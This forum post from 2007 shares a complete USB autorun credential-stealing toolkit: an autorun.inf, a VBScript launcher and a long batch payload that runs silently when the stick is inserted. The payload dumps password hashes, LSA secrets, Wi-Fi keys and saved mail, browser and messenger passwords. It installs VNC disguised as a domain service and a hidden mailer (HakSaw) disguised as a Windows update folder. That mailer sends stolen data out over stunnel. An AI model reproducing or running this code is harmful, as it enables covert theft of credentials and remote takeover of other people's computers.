NetStumbler.org Forums - View Single Post

beakmyn · 11-13-2007

UPDATE: Using Gonzor's (hak.5 forum) approach I've added my little parts and
Basically, you have in your Flash partition
System/src/Include/1-20.dat

Based on which dat files exist you can control what gets run. I.E. I don't
have 2.dat or 3.dat (hacksaw and vnc). This allows for a bit of customization iwithout having to re-compile the .ISO

FD = flash partition
U3 = CD partition

Code:

Root of CD partition

Quote:

Originally Posted by autorun.inf

[AutoRun]
open=wscript autorun.vbs
icon=LaunchU3.exe,0

[Definitions]
Launchpad=LaunchPad.exe

[CopyFiles]
FileNumber=1
File1=LaunchPad.zip

Quote:

Originally Posted by autorun.vbs

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next

strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)

For Each objDrive in colDrives
'ignore floppy drives - reserved by BIOS if they don't exist
If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
strfd = objDrive.Driveletter & ":"
End If
If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\go.bat") Then
strU3 = objDrive.Driveletter & ":"
End If
End if
Next

If objFSO.FileExists(strfd & "\System\SRC\PL.dat") Then
objShell.Run strU3 & "\System\SRC\go.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False

End If

If objFSO.FileExists(strfd & "\System\SRC\U3.dat") Then
objShell.Run ".\LaunchU3.exe -a"

End If

Quote:

Originally Posted by U3\System\SRC\go.bat

:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off

If %computername%.==. SET computername=computer
If %username%.==. SET username=None

SET fd=%1\System
SET U3=%2\System\SRC

CD %U3% >NUL

:: SET LOG PATHS
IF NOT EXIST %fd%\Logs\%computername% (
MD %fd%\Logs\%computername%
)

SET logdir=%fd%\Logs\%computername%
SET log="%fd%\Logs\%computername%\%computername%-[%3-%4].log"
SET tmplog="%fd%\Logs\%computername%\%computername%_TE MP.log"
SET include="%fd%\SRC\Include
SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
SET /p winaud=<"%1\System\SRC\Include\winaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

IF EXIST %include%\0.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [System info] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
IPCONFIG /all >> %log% 2>&1

Echo +-----------------------------------+ >> %log% 2>&1
Echo + Shares + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net share >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Users + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net user >> %log% 2>&1
)

IF EXIST %include%\1.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [External IP] +>> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO External IP dumped >> %log% 2>&1
.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
ECHO. >> %tmplog% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\2.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [VNC] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO VNC was installed silently >> %log% 2>&1
XCOPY ".\vnc\*.*" "%systemroot%" /c /y
SC create WinVNC binpath= "%systemroot%\winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" 2>&1
SC description WinVNC "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." 2>&1
REGEDIT /s .\vnc.reg 2>&1
NET START WinVNC 2>&1
)

IF EXIST %include%\3.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [HakSaw] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO HakSaw was installed silently >> %log% 2>&1
MD "%systemroot%\$NtUninstallKB931337$" || MD "%appdata%\sbs" 2>&1
XCOPY .\HS\*.* "%systemroot%\$NtUninstallKB931337$\" /y || XCOPY .\HS\*.* "%appdata%\sbs" /y 2>&1
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.lnk" /f || "%appdata%\sbs\shortcut.exe" /f:"%allusersprofile%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" 2>&1
COPY ".\send.bat"+%include%\HS.dat" "%systemroot%\$NtUninstallKB931337$\send.bat" || COPY ".\send.bat"+%include%\HS.dat" "%appdata%\sbs\send.bat" 2>&1
COPY %include%\HS2.dat" "%systemroot%\$NtUninstallKB931337$\stunnel.co nf" || COPY %include%\HS2.dat" "%appdata%\sbs\stunnel.conf" 2>&1
ATTRIB "%systemroot%\$NtUninstallKB931337$" +s +h & ATTRIB "%appdata%\sbs" +s +h 2>&1
.\SBS.lnk & .\SBS2.lnk
)

IF EXIST %include%\4.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Wifi Hex] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wifike.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog% %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\5.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pwdump 127.0.0.1 >> %log% 2>&1
)

IF EXIST %include%\6.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD /d %logdir% 2>&1
%U3%\fgdump.exe -c >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1* >NUL
CD /d %U3%
)

IF EXIST %include%\7.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Network PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\netpass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\8.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Mail PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mailpv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\9.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
Echo + [Dump Firefox PW] + >> %log% 2>&1
Echo +----------------------------------+ >> %log% 2>&1
.\FirePassword.exe >> %log% 2>&1
)

IF EXIST %include%\10.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump IE PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\11.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump messenger PW] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\mspass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\12.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Cache] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\cachedump.exe >> %log% 2>&1
)

IF EXIST %include%\13.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump LSA secrets] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\pspv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\14.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Product Keys] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\produkey.exe /nosavereg /stext "%tmplog%" /remote %computername% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\15.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump URL History] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CSCRIPT //nologo .\DUH.vbs >> %log% 2>&1
)

IF EXIST %include%\16.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump Updates-List] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\wul.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
)

IF EXIST %include%\17.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Network Services] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
netstat.exe -abn >> %log% 2>&1
)

IF EXIST %include%\18.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Port Scan] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO. >> %log% 2>&1
)

IF EXIST %include%\19.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Clipboard + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\nircmd.exe clipboard addfile %log%
)

IF EXIST %include%\20.dat" (
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo + Win Audit + >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
ECHO WinAudit saved to %logdir% >> %log% 2>&1
.\WinAudit.exe %winaud% /f=%logdir%\WA_%computername%[%3-%4] /f=%logdir%\WA_%computername%[%3-%4].txt >> %log% 2>&1
ECHO. >> %log% 2>&1
)

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1

:End
EXIT

For getting the external IP

Quote:

Originally Posted by FD/system/src/include/EIP.dat

Current IP Check

Quote:

Originally Posted by FD/system/src/include/winaud.dat

/r=oxutn /o=PDF /m=CA Security Scan

You'll need parmavex Winaudit if you want 20.dat to run
Read the help file for info on the /r switch.

Quote:

Originally Posted by FD\system\src\include\

0 - System Info , Shares, Users
1 - External IP
2 - VNC
3 - Haksaw
4 - WIFI Key
5 - SAM PWDUMP
6 - SAM FGDUMP
7 - Network Password
8 - Mail Password
9 - Firefox Password
10 - IE Password
11 - Messenger Password
12 - Cache
13 - LSA Secrets
14 - Product Keys
15 - IE URL History
16 - Windows Updates List
17 - Network Services
18 - Open Port Scan
19 - Clipboard
20 - Win Audit
EIP - External IP check URL
winaud - command line options
HS2 - Mail Server for Haksaw
HS - Mail Message, username, Password